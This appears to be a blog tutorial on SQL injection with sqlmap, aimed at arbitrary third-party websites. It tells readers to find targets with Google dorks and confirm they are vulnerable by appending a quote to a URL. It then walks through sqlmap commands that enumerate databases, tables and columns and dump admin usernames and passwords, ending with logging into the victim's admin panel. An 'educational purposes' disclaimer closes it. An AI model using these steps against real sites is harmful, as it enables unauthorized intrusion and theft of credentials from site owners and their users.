What is Sqlmap?
Sqlmap is one of the most powerful penetration testing tools available in the internet. It is one of my favorite tools and it is coded in python. You can use sqlmap to exploit and extract database information from sql vulnerable websites.How to Find SQL Vulnerable Websites?
In order to use sqlmap you must have a sql vulnerable website. In order to find sql vulnerable website you can use google dorks. An example of a google dork is:inurl:index.php?id=1 .Big List of Google Dorks
How to test if a website is SQL Vulnerable?
In order to test if a website is vulnerable to sql injection what you have to do is adding ' after the google dork:Example: http://www.website.com/index.php?id=1'
If you get an error like : "You have an error in your sql syntax" or if an image dissapears or if you get a my_sql error, the website is vulnerable to sql injection.
Exploitation Part - How to use Sqlmap
Copy the url of the website without the ' : http://www.website.com/index.php?id=11)Open terminal (if you are under linux or open command prompt if you are under windows) and type the following command: ./sqlmap.py -u http://www.website.com/index.php?id=1 --dbs
-u - the url of the website
--dbs - enumerate databases from the sql vulnerable website
2)After that you will get the database for example: db_web . Now type this command in theterminal: ./sqlmap.py -u http://www.website.com/index.php?id=1 -D db_web --tables
-D to specify the database name where we want to extract data from
--tables to get the tables from the database
3)Now that we have the database name and the tables we need to choose a table andextract its columns. If you want to hack the website you need to get the login data which is usually located in tables with the name like this: users,usuarios,tbl_admin,admin_login,login etc. Let's say we have a table named tbl_admin. Now to get its columns type this into the terminal: ./sqlmap.py -u http://www.website.com/index.php?id=1 -D db_web -T tbl_admin --columns
-T to specify the table name where we want to extract columns from
--columns to get the columns from the previously specified table
4)Now the final step, we need to get the username and the password so we can login to the website.Usually the columns containing the login info are named: username,password or user,password etc.Type This into the terminal : ./sqlmap.py -u http://www.website.com/index.php?id=1 -D db_web -T tbl_admin -C username,password --dump
-C specify the columns name where we want to extract data from
--dump dump the information contained in the previously specified columns.
5)Now you have the login info. Now we need to find the login page of the website . To do that you need an admin finder script. There are plenty out there available but i will share my own (coded by me). DOWNLOAD LINK FOR ADMIN FINDER. Note: You need python 2.7 installed in order to use it (already on linux, has to be installed in windows). After you use this script, and get the admin login page of the website just put the login info you got before and there you go you. you are inside the admin page of your target.
Download Sqlmap from: http://sqlmap.org
Download Python from: http://www.python.org/getit/
Disclaimer : This tutorial is for educational purposes only. We are not responsible of what you do. Use your knowledge for good purposes!
No comments:
Post a Comment